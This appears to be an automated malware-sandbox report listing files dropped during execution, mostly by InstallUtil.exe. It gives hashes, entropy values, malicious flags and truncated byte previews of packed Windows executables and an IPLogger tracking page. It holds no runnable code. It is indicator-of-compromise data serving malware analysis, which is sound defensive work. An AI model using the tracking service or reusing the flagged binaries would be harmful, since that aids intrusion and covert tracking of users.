Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):36044800
Entropy (8bit):7.999963633984123
Encrypted:true
SSDEEP:786432:LGKQI6b1K2iURSVSRO4ro3zDThekLomyAl5as15mLyxPiWfBer:PQlb1K2VRNro3znhnh15oy4WQ
MD5:33635137DFEC694F752AC199035AA716
SHA1:E868B8AEE66592FF4B8E9B16B585A314FCF09280
SHA-256:8BBF7790F6AADA2E77F59406B20F831149B0B93B1E3C8AFBF3D2C72CE4A10ED1
SHA-512:95688ADCF1DBC41C0F75B8D79D47E14976E679877C3E1803E2C09F8520171EC54EEF1C1AF8F6A9A4164BA297CC56B064E5A2F204C2B6BE1C75AF7464413673C9
Malicious:true
Reputation:unknown
Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...'..P.................(...F.......-.......@....@..........................................................................b...........................)...........................................................@..d............................text....&.......(.................. ..`.rdata...5...@...6...*..............@..@.data....)...........`..............@....rsrc................h..............@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P....P.|..Y.nj'.v....u..v..=.BA..6P......P....9^..].v8.^..3......hhDA.P..........P......P..pAA..E..E....;F.r......P.J|..Y.24..j...lAA...t$..D....3.9.H.A.t...@....9D$.t..t$.Ph.....5@.A....BA.3.....D$..`...|$..u..@.....3.....t$..D$..t$...`.A......t$...P.Q..%`.A...D$...V...t...P.Q...^...VW.|$.....t...W.P.....t...P.Q..>.._^....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q.......3.9F.Y~.9F.~...f..Af..G@;F.|..6....

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
SSDEEP:3:NlllulVmdtZ:NllUM
MD5:013016A37665E1E37F0A3576A8EC8324
SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                                                                                                                                                                                                SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                                                                                                                                                                                                SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:@...e................................................@..........
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4283784
                                                                                                                                                                                                                                Entropy (8bit):7.981853182461957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                                                                                                                                MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                                                                                                                                SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                                                                                                                                SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4283784
                                                                                                                                                                                                                                Entropy (8bit):7.981853182461957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                                                                                                                                MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                                                                                                                                SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                                                                                                                                SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4283784
                                                                                                                                                                                                                                Entropy (8bit):7.981853182461957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                                                                                                                                MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                                                                                                                                SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                                                                                                                                SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4283784
                                                                                                                                                                                                                                Entropy (8bit):7.981853182461957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                                                                                                                                MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                                                                                                                                SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                                                                                                                                SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
Entropy (8bit): 5.422209848736349
Encrypted: false
SSDEEP: 192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5: 5B423612B36CDE7F2745455C5DD82577
SHA1: 0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256: E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512: C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious: false
Reputation: unknown
Preview: <!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4283784
Entropy (8bit): 7.981853182461957
Encrypted: false
SSDEEP: 98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5: F0A6999F1BC47C6C468CF6DB95003AD5
SHA1: 34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256: 26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512: 26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 2146073
Entropy (8bit): 7.982154114080947
Encrypted: false
SSDEEP: 49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5: 4D3AD654117203E9216F6F44480BB6E0
SHA1: 8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256: 965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512: 7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category: dropped
Size (bytes): 2960760
Entropy (8bit): 7.76847662210834
Encrypted: false
SSDEEP: 49152:anSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHA:ZWqlkLESgCRE/vhOjb05efd6e/oXHA
MD5: 8CCBA0307EC170E05AC6068B7B000FB6
SHA1: 6673BFAC81C38F68A717B7FE329FB0548D88E511
SHA-256: E3009D8ED74E29D85D2DAD40B1C0CCC2010089A99437790A7400E64F0F829A72
SHA-512: 26ED579D77A2E93E424CA1395118F4FC2E5E20F5E23899B2CFD6A44496925D77407B42ECD38027AAE03E23AB1871DA889A90970760967C64F52C3D90792E3700
Malicious: true
Reputation: unknown
Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2172545
Entropy (8bit): 7.994835824960051
Encrypted: true
SSDEEP: 49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5: 9D959BCB3482D418504AF43B76F7A181
SHA1: 47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256: E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
